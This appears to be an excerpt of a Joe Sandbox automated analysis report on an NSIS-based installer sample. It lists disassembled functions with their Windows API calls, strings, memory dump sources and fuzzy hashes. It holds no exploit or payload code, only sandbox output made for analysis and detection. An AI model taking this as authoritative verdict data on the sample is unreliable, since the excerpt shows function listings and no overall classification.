                                                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                          Function 004037E2 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0040604E: CharNextW.USER32(?,*?|<>/":,00000000,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060B1
                                                            • Part of subcall function 0040604E: CharNextW.USER32(?,?,?,00000000), ref: 004060C0
                                                            • Part of subcall function 0040604E: CharNextW.USER32(?,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060C5
                                                            • Part of subcall function 0040604E: CharPrevW.USER32(?,?,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060D9
                                                          • CreateDirectoryW.KERNELBASE(008560C8,00000000,008560C8,008560C8,008560C8,-00000002,00403A21), ref: 00403803
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                          • String ID:
                                                          • API String ID: 4115351271-0
                                                          • Opcode ID: 6aaccbf0f4c256e95583d3efcb425cbe1f8ad9d91dfce7af8f321156cb5e1b29
                                                          • Instruction ID: b75284c5955f365d0d9c4c727e495e4f3aae82af695c09dbce3dc5899ee9d583
                                                          • Opcode Fuzzy Hash: 6aaccbf0f4c256e95583d3efcb425cbe1f8ad9d91dfce7af8f321156cb5e1b29
                                                          • Instruction Fuzzy Hash: CBD0C751143D3061D5A1336A7D06FCF0D4DAF5271AB06407BF945B71C29E7C065A45FE
                                                          Function 00403DC5 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DD7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: a4c2fbc6537a4e2e10d0aaa18e55a0f473435c9c430a92ea22682a11aa367049
                                                          • Instruction ID: 351e0a8c765281c3195cd404f5b3ad0414b1fc796bc1ebfc3b4bb23d15cda905
                                                          • Opcode Fuzzy Hash: a4c2fbc6537a4e2e10d0aaa18e55a0f473435c9c430a92ea22682a11aa367049
                                                          • Instruction Fuzzy Hash: 5EC04C71741200BADE118B509D45F4677595B54B01F14842D7751E50E0C675E450D61C
                                                          Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403770,?,?,?,?,00000000,00403A5D,?), ref: 00403376
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                          Function 00403DAE Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,004057CA), ref: 00403DBC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: a7e957f13f870acf51719ce23fee518245a8468dc0d415f7553b12ea6140625d
                                                          • Instruction ID: 6c132dfc24aee7538c722acb3c4fbe442182aafe193b813e67a2c49468a4fdb9
                                                          • Opcode Fuzzy Hash: a7e957f13f870acf51719ce23fee518245a8468dc0d415f7553b12ea6140625d
                                                          • Instruction Fuzzy Hash: CDB09235181601EADE514B00DE0AF857B62A7A4701F408028B242640B0CAB200A0DB08
                                                          Function 00403D9B Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,00405763), ref: 00403DA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 4eba91875022923bbdfface656c56718ce72c38f834018de90076ae375f390c0
                                                          • Instruction ID: 124cd2e5effcc533ed8d6a5d300d068c0f0f2c80faf0ecfbfa66a2b2702a8cfe
                                                          • Opcode Fuzzy Hash: 4eba91875022923bbdfface656c56718ce72c38f834018de90076ae375f390c0
                                                          • Instruction Fuzzy Hash: A0A01231000800DBCE015B00EF05D057F21B750300700C128E1411003086350424EB08

                                                          Non-executed Functions

                                                          Function 00406CB1 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?), ref: 00406CCE
                                                          • lstrcatW.KERNEL32(007DB150,\*.*,007DB150,?,-00000002,008560C8), ref: 00406D1F
                                                          • lstrcatW.KERNEL32(?,00408838,?,007DB150,?,-00000002,008560C8), ref: 00406D3F
                                                          • lstrlenW.KERNEL32(?), ref: 00406D42
                                                          • FindFirstFileW.KERNEL32(007DB150,?), ref: 00406D56
                                                          • FindNextFileW.KERNEL32(?,?,000000F2,?), ref: 00406E38
                                                          • FindClose.KERNEL32(?), ref: 00406E49
                                                          Strings
                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E85
                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EA9
                                                          • Delete: DeleteFile("%s"), xrefs: 00406DD2
                                                          • \*.*, xrefs: 00406D19
                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406E13
                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EC6
                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E6E
                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DF6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                          • API String ID: 2035342205-3294556389
                                                          • Opcode ID: 5ce95e6898711e9886f103bf4f784cefd31a843339168ff7e1eca7dec36df742
                                                          • Instruction ID: 0e06370173042cf1970d3b282d3fdac29725624d265da3f13fe54d6ba55e86a8
                                                          • Opcode Fuzzy Hash: 5ce95e6898711e9886f103bf4f784cefd31a843339168ff7e1eca7dec36df742
                                                          • Instruction Fuzzy Hash: EE51F435904305AACB217B65CD46ABF37B8DF41724F16813FF902751C1DB3C49A29AAD
                                                          Function 0040681B Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetVersion.KERNEL32(007B9A60,?,00000000,00404FBF,007B9A60,00000000,00423AB9,0041F150,00000000), ref: 004068EC
                                                          • GetSystemDirectoryW.KERNEL32(007E0D60,00002004), ref: 0040696E
                                                            • Part of subcall function 0040601F: lstrcpynW.KERNEL32(?,?,00002004,00403907,007E95E0,NSIS Error), ref: 0040602C
                                                          • GetWindowsDirectoryW.KERNEL32(007E0D60,00002004), ref: 00406981
                                                          • lstrcatW.KERNEL32(007E0D60,\Microsoft\Internet Explorer\Quick Launch), ref: 004069FB
                                                          • lstrlenW.KERNEL32(007E0D60,007B9A60,?,00000000,00404FBF,007B9A60,00000000,00423AB9,0041F150,00000000), ref: 00406A5D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$`~$`~
                                                          • API String ID: 3581403547-450655766
                                                          • Opcode ID: 374e0595bb97e7487ac609e740c3c1fde53312a0c63930343963d002ff647ad1
                                                          • Instruction ID: f0e19f9528a57ac158c9a3c92ca4e3ea7bb27298c0fdca1021e2216b23c4434f
                                                          • Opcode Fuzzy Hash: 374e0595bb97e7487ac609e740c3c1fde53312a0c63930343963d002ff647ad1
                                                          • Instruction Fuzzy Hash: 9771F3B1A00215EBDF20AF69CC456BA3774AB55714F12C03FE902BA2D0D73D89A1DF99
                                                          Function 00407577 Relevance: .6, Instructions: 628COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65dabb3e933bcef0ed0642d24bd0ae254dba7200c983b735164db606a1674a6a
                                                          • Instruction ID: 27a4fad9cef60e4803cbff8213b55d1ca64cbec4a5672e8aa3d352da4673dde9
                                                          • Opcode Fuzzy Hash: 65dabb3e933bcef0ed0642d24bd0ae254dba7200c983b735164db606a1674a6a
                                                          • Instruction Fuzzy Hash: 03429E71D08249DFDB15CF59C8806EEBBB5EF14318F14807BDC49AB286D338A946CB66
                                                          Function 00406AAF Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 163filestringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcpyW.KERNEL32(007D9B00,NUL,?,00000000,?,00000000,?,00406CA6,?,?,00000001,00406EC4,?,00000000,000000F1,?), ref: 00406ABF
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00406CA6,?,?,00000001,00406EC4,?,00000000,000000F1,?), ref: 00406ADE
                                                          • GetShortPathNameW.KERNEL32(?,007D9B00,00000400), ref: 00406AE7
                                                            • Part of subcall function 00405DCC: lstrlenA.KERNEL32(00406BE9,?,00000000,00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405DDC
                                                            • Part of subcall function 00405DCC: lstrlenA.KERNEL32(00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405E0E
                                                          • GetShortPathNameW.KERNEL32(?,007DF158,00000400), ref: 00406B08
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,007D9B00,000000FF,007DA300,00000400,00000000,00000000,?,00000000,?,00406CA6,?,?,00000001,00406EC4), ref: 00406B31
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,007DF158,000000FF,007DA950,00000400,00000000,00000000,?,00000000,?,00406CA6,?,?,00000001,00406EC4), ref: 00406B49
                                                          • wsprintfA.USER32 ref: 00406B63
                                                          • GetFileSize.KERNEL32(00000000,00000000,007DF158,C0000000,00000004,007DF158,?), ref: 00406B9B
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BAA
                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BC6
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BF6
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007DAD50,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C4D
                                                            • Part of subcall function 00405E66: GetFileAttributesW.KERNELBASE(00000003,004035DD,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00405E6A
                                                            • Part of subcall function 00405E66: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A5D,?), ref: 00405E8C
                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C61
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C68
                                                          • CloseHandle.KERNEL32(?), ref: 00406C72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                          • String ID: %s=%s$NUL$[Rename]
                                                          • API String ID: 565278875-4148678300
                                                          • Opcode ID: 1114a109490fbdc9d9cd55ac8155771844d87d5164aa3d9ff1e3f2f03f1a6129
                                                          • Instruction ID: 9e8937d24cbcc237378a1661f1c9ec94e544457fac856d3cc281a3c4cf2fe410
                                                          • Opcode Fuzzy Hash: 1114a109490fbdc9d9cd55ac8155771844d87d5164aa3d9ff1e3f2f03f1a6129
                                                          • Instruction Fuzzy Hash: 80412772108209BFD6202B71DE8CD6B3A6CEF4A754B16053EF286F22D1DA389815867D
                                                          Function 004060FD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062EA,00000000), ref: 00406114
                                                          • GetFileAttributesW.KERNEL32(007E8D80,?,00000000,00000000,?,?,004062EA,00000000), ref: 00406152
                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,?,00000000,007E8D80,40000000,00000004,?,?,004062EA,00000000), ref: 0040618B
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,007E8D80,40000000,00000004,?,?,004062EA,00000000), ref: 00406197
                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062EA,00000000), ref: 004061B1
                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062EA,00000000), ref: 004061B8
                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,?,00000000,?,?,004062EA,00000000), ref: 004061CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                          • API String ID: 3734993849-2769509956
                                                          • Opcode ID: 53c63a071f7c75f6cc39809f4cfc821ae677a8637f79a140c0a1ee0d9f50a72e
                                                          • Instruction ID: 63b6af9be1db431a2b362d5c3b596523b37325ffd0be647115a0f8ea25bc4e05
                                                          • Opcode Fuzzy Hash: 53c63a071f7c75f6cc39809f4cfc821ae677a8637f79a140c0a1ee0d9f50a72e
                                                          • Instruction Fuzzy Hash: D921C571500244BFD7109F64DE89D9B3728EB01370B11C33AF52ABA1E1D7385D858BAC
                                                          Function 0040324C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                          • MulDiv.KERNEL32(00011600,00000064,0074EB62), ref: 00403295
                                                          • wsprintfW.USER32 ref: 004032A5
                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: bt$verifying installer: %d%%
                                                          • API String ID: 1451636040-1286246329
                                                          • Opcode ID: 0927bb4ed48fc27ce86c7514204bd566bf0cfbbf84362ab54b8100dd2a89eb04
                                                          • Instruction ID: 9fbafa62008f9a5ff2b290cb2ce3c23c2df22ed1ca64675581df3bb266551b9d
                                                          • Opcode Fuzzy Hash: 0927bb4ed48fc27ce86c7514204bd566bf0cfbbf84362ab54b8100dd2a89eb04
                                                          • Instruction Fuzzy Hash: BB014470610209ABEF109F60DD59FAA3B69FB00349F00803DFA45B91E0DB7896558B58
                                                          Function 00403DE0 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DFA
                                                          • GetSysColor.USER32(00000000), ref: 00403E16
                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E22
                                                          • SetBkMode.GDI32(?,?), ref: 00403E2E
                                                          • GetSysColor.USER32(?), ref: 00403E41
                                                          • SetBkColor.GDI32(?,?), ref: 00403E51
                                                          • DeleteObject.GDI32(?), ref: 00403E6B
                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E75
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
